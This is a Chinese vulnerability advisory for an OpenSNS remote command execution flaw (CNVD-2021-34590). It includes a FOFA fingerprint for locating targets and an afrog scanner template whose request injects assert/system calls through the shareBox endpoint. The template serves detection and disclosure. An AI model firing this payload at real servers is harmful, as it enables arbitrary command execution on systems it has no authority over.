CNVD-2021-34590: OpenSNS Application ShareController.class.php 远程命令执行漏洞

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令 fofa: icon_hash="1167011145"

PoC代码[已公开]

id: CNVD-2021-34590

info:
  name: OpenSNS Application ShareController.class.php 远程命令执行漏洞
  author: daffainfo
  severity: critical
  description: |-
    OpenSNS 存在远程命令执行漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令
    fofa: icon_hash="1167011145"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/OpenSNS%20Application%20ShareController.class.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
  tags: cnvd,cnvd2021,rce
  created: 2021/10/23

rules:
  r0:
    request:
      method: GET
      path: /index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
    expression: response.status == 200 && response.body.bcontains(b'分享至微博') && response.body.bcontains(b'<img src="/Application/Weibo/Static/images/share_default.png">')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-34590.yaml